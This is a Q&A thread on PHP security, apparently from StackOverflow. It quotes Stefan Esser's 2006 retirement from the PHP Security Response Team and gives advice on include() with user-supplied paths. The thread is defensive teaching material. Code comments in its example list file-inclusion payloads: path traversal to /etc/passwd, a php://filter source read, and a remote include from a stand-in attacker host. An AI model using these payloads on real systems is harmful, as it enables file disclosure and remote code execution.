How secure is PHP?

To quote RSnake from a sla.ckers.org post back in 2006:

I thought what was interesting is that Stefan Esser retired from the PHP incident response team. Not to start a religious war on the boards, but it's interesting that the founder of PHP's security response team is fed up with the lack of security in PHP and quit as a result. His site is down at the moment (traffic flood?): [blog.php-security.org] So here is a cut and paste of the cache:

Saturday, December 9. 2006

Last night I finally retired from the PHP Security Response Team, that was initially my idea a few years ago.

The reasons for this are many, but the most important one is that I have realised that any attempt to improve the security of PHP from the inside is futile. The PHP Group will jump into your boat as soon as you try to blame PHP's security problems on the user, but the moment you criticize the security of PHP itself you become persona non grata. I stopped counting the times I was called an immoral traitor for disclosing security holes in PHP or for developing Suhosin.

For the ordinary PHP user this means that I will no longer hide the slow response time to security holes in my advisories. It will also mean that some of my advisories will come without patches available, because the PHP Security Response Team refused to fix them for months. It will also mean that there will be a lot more advisories about security holes in PHP.

Posted by Stefan Esser in PHP, Security at 10:58

Well, scary as that sounds, I am really excited to finally get the "real deal" on PHP security. I've always been a little wary of it and it will be interesting to see what Stefan has to say.

source: http://sla.ckers.org/forum/read.php?2,3976

Which nicely introduces the Hardened-PHP project's Suhosin (http://www.hardened-php.net/suhosin/) and Esser's Month of PHP Bugs project (http://www.php-security.org/).


Just like any other language, PHP code is as secure as the programmer writes it.

Also like any other language, individual (and even common) security risks are too numerous and detailed to include in a StackOverflow answer.

Find a book which covers Secure PHP coding.


Don't trust the user.

include "a/literal/file.php"; // path fixed by the programmer at write time

is quite safe

include $someFile; // path decided at run time

means you want to think about how $someFile gets set. If you use any data that was given to you by a user to set $someFile's value, you'd better sanitize it.
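The point made in this answer, as an added example that is not part of the original post: the unsafe `include $someFile` pattern next to a hardened version. The example assumes a small front controller that picks a template from a `?page=` query parameter; the `pages/` directory, the `PAGES` map and the helper functions `render_page_unsafe`, `resolve_page`, `path_within` and `render_page_safe` are all hypothetical names chosen for the illustration.

```php
<?php
// Added example, not code from the original answer.
// Assumes a front controller selecting a template via ?page=..., with
// templates stored under __DIR__ . '/pages/' (hypothetical layout).
declare(strict_types=1);

// VULNERABLE: user-controlled text reaches include() as part of the path.
// Typical abuse (local file inclusion / source disclosure / remote inclusion):
//   ?page=../../../../etc/passwd%00        (null byte truncation on old PHP)
//   ?page=../../../../etc/passwd           (if no suffix is appended)
//   ?page=php://filter/convert.base64-encode/resource=config
//   ?page=http://attacker.example/shell    (only if allow_url_include=On)
function render_page_unsafe(string $page): void
{
    include __DIR__ . '/pages/' . $page . '.php';
}

// HARDENED, option 1: the input is never used as a path. It is only a key
// into a fixed map of files the application itself decided are includable.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $page): ?string
{
    // Returns the literal file name for a known key, or null for anything
    // else ('', '../x', 'php://...', 'http://...' all fall through to null).
    return PAGES[$page] ?? null;
}

// HARDENED, option 2 (when an allowlist is impractical): resolve the
// candidate with realpath() and require it to stay inside the base directory.
// realpath() returns false for missing files and for stream wrappers such as
// php://, so those are rejected as well. Requires PHP 8 for str_starts_with().
function path_within(string $base, string $candidate): bool
{
    $baseReal = realpath($base);
    $real     = realpath($base . '/' . $candidate);
    return $baseReal !== false
        && $real !== false
        && str_starts_with($real, $baseReal . DIRECTORY_SEPARATOR);
}

function render_page_safe(string $page): void
{
    $file = resolve_page($page);
    if ($file === null || !path_within(__DIR__ . '/pages', $file)) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    // Only a literal from PAGES, already confirmed to live under pages/, is included.
    include __DIR__ . '/pages/' . $file;
}

// Front controller: the raw query value goes through the allowlist, never
// straight into include().
$page = $_GET['page'] ?? 'home';
render_page_safe($page);
```

Option 1 is the one to reach for by default: the string the user sent is compared against known keys and then discarded, so there is nothing to "sanitize". Option 2 is a containment check for the cases where the set of files is not fixed, and it is deliberately used here as a second layer even though the allowlist already makes it redundant.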